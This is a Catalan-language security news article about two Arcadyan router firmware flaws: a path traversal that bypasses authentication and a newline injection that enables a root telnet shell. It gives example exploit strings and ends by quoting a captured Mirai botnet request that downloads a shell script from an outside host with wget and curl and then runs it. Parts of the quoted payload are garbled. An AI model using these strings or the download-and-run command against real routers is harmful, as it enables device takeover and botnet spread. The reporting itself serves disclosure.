S'ha registrat un atac massiu a la xarxa contra encaminadors domèstics el firmware dels quals utilitza una implementació de servidor HTTP de l'empresa Arcadyan. Per obtenir el control dels dispositius, s'utilitza una combinació de dues vulnerabilitats que permet l'execució remota de codi arbitrari amb drets d'arrel. El problema afecta una gamma força àmplia d'encaminadors ADSL d'Arcaden, ASUS i Buffalo, així com dispositius subministrats amb les marques Beeline (el problema es confirma a Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone i altres operadors de telecomunicacions. Cal assenyalar que el problema ha estat present al firmware Arcadyan des de fa més de 10 anys i durant aquest temps ha aconseguit migrar a almenys 20 models de dispositius de 17 fabricants diferents.
La primera vulnerabilitat, CVE-2021-20090, permet accedir a qualsevol script d'interfície web sense autenticació. L'essència de la vulnerabilitat és que a la interfície web, alguns directoris a través dels quals s'envien imatges, fitxers CSS i scripts JavaScript són accessibles sense autenticació. En aquest cas, els directoris als quals es permet l'accés sense autenticació es comproven amb la màscara inicial. El microprogramari bloqueja l'especificació de caràcters "../" als camins per anar al directori principal, però s'omet la combinació "..%2f". Així, és possible obrir pàgines protegides quan s'envien peticions com "http://192.168.1.1/images/..%2findex.htm".
La segona vulnerabilitat, CVE-2021-20091, permet a un usuari autenticat fer canvis a la configuració del sistema del dispositiu enviant paràmetres amb un format especial a l'script apply_abstract.cgi, que no verifica la presència d'un caràcter de nova línia als paràmetres. . Per exemple, quan realitza una operació de ping, un atacant pot especificar el valor "192.168.1.2%0AARC_SYS_TelnetdEnable=1" al camp amb l'adreça IP que s'està comprovant i l'script, quan es crea el fitxer de configuració /tmp/etc/config/ .glbcfg, hi escriurà la línia "AARC_SYS_TelnetdEnable=1", que activa el servidor telnetd, que proporciona accés sense restriccions a l'intèrpret d'ordres amb drets d'arrel. De la mateixa manera, establint el paràmetre AARC_SYS, podeu executar qualsevol codi del sistema. La primera vulnerabilitat permet executar un script problemàtic sense autenticació accedint-hi com a “/images/..%2fapply_abstract.cgi”.
Per explotar les vulnerabilitats, un atacant ha de poder enviar una sol·licitud al port de xarxa on s'executa la interfície web. A jutjar per la dinàmica de propagació de l'atac, molts operadors deixen l'accés als seus dispositius des de la xarxa externa per simplificar el diagnòstic dels problemes per part del servei d'assistència. Si l'accés a la interfície es limita només a la xarxa interna, es pot dur a terme un atac des d'una xarxa externa mitjançant la tècnica de "revincular DNS". Les vulnerabilitats ja s'estan utilitzant activament per connectar encaminadors a la botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connexió: tanca User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Font: opennet.ru